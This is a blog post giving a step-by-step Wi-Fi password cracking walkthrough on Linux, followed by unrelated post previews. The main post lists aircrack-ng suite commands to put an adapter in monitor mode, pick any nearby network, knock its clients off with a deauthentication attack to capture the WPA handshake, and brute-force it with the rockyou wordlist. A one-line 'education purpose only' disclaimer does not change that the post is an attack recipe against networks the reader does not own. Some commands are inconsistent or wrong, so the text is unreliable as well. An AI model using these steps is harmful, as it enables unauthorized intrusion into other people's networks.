Skip to main content

how to get the wifi password in linux

this a easy one . So iam not gonna describe  the whole thing jsut follow the steps thats all.
Lets gets to it :)


first you need some free tools . if you are using a kali linux distro you already have it in case you dont follow this commands one by one



  • sudo apt-get install airmon-ng 
  • sudo apt-get install airodump-ng
  • sudo apt-get install aireplay-ng
  • sudo apt-get install aircrack-ng 
downlod this wordlist


http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt


and after this these we pretty much get everything we need


next step type in

ifconfig


it will show the available device pick one in mind it will looks like wlan1 wlan0 something like that 


and iam gonna pick wlan0

next type in
airmon-ng wlan0 start 
thats will start our wlan0 as monitor mode
and show some process kill them all with
kill pid

then type in
airodump-ng wlan0mon
 this will show all the available network pick the network and copy the essid,channel and bssid to a clipboard you will need it

now open a new tab type in(fill in bssid essid and channel your self from the clipboard)
 airodump-ng -c channel -w /root/essid --bssid bssid wlan1mon
 open a new tab type in (fill in the bssid)
aireplay-ng -0 -0 -a bssid wlan1mon
 wait for a sometime and then you will notice wpa handshake in our airodump tab.

to the last step 
copy both the .cap file from this /root/essid place anf the rockyou.txt to a common folder
open a new tab and ove to the common folder useing the cd command
then type in
aircrack-ng -w rockyou.txt *.cap

this will take some time .



for not the rockyou.txt have a large collection for words and aircrack compare it with the .cap file and eventually find a match


and for my defense this blog is for education purpose only and you guys should have fun while staying inside the law   

 

Comments

Popular posts from this blog

Data Type vs Return Type

Legend Of The Returned One Aha that is a question right ? Aren't they are the same thing ? At some point I honestly thought the same but actually it's not data type is not return type and return type is not data type . E ven if you are using Java php c++ or any other languages During a program we have to initialize or declare some variable for that we need to specify what data are we gonna use on that particular variable location . Then what is return type ? We seen that when we a create  or providing the definition to a function we have to specify a return type to indicate what data type is return from the function to the main function to be more specific it's know as return data type. For example void cat ( ) " the function cat is not returning any data " or int cat( ) " means cat is returning some value to the main function" Ever seen any variable as a data type of return? I haven't and please let me know...

Super Secret Razer Laptop

Project Valerie W hen i heard the name Valerie i had to look at the internet for its meaning and it means strong also found some other meaning like . Valerie is a VERY sexy women who is also very intelligent. She has beautiful eyes and is sometimes considered to be a savage, but those people know as well as everyone else, that she is trully one of a kind  And that make perfect seance why Razer pick the name  What is project valerie? the world’s first automated triple display laptop. Constructed to be incredibly powerful yet mobile, this revolutionary laptop gives you easy access to three eye-popping 4K displays. Regardless of where you are, you can have the visual superiority of a 12K desktop setup to excel at both work and play. This is from  razer website by the way  You can also find some other fantasy stuffs from the website like Featuring three stunning high resolution 17.3 inch 4K screens, Proje...

VPN

What Is VPN ? How Dose It Work? What It Does For You ? VPN/ Virtual private Network are used to day for many reasons but we can throw all of those to a general bin .That is securely connecting an individual user to a larger network .in the older days VPN are used by cooperate employees to access their office by remote when they needed to access sensitive informations in a secured way .But in time vpn technology is available to regular internet users it helps people from all around the world to connect in  a secured way .VPN allows your connection to be encrypted and secure to become a anonymous surfing user in the web and also keep you traffic data safe from hackers mean government or may be your over concerned significant others . VPN also get you to access blocked things because of geo location some on-line things such as videos ,music file,news,search engines and so on are unavailable in some country/or places by using VPN make the user looks like a lock ...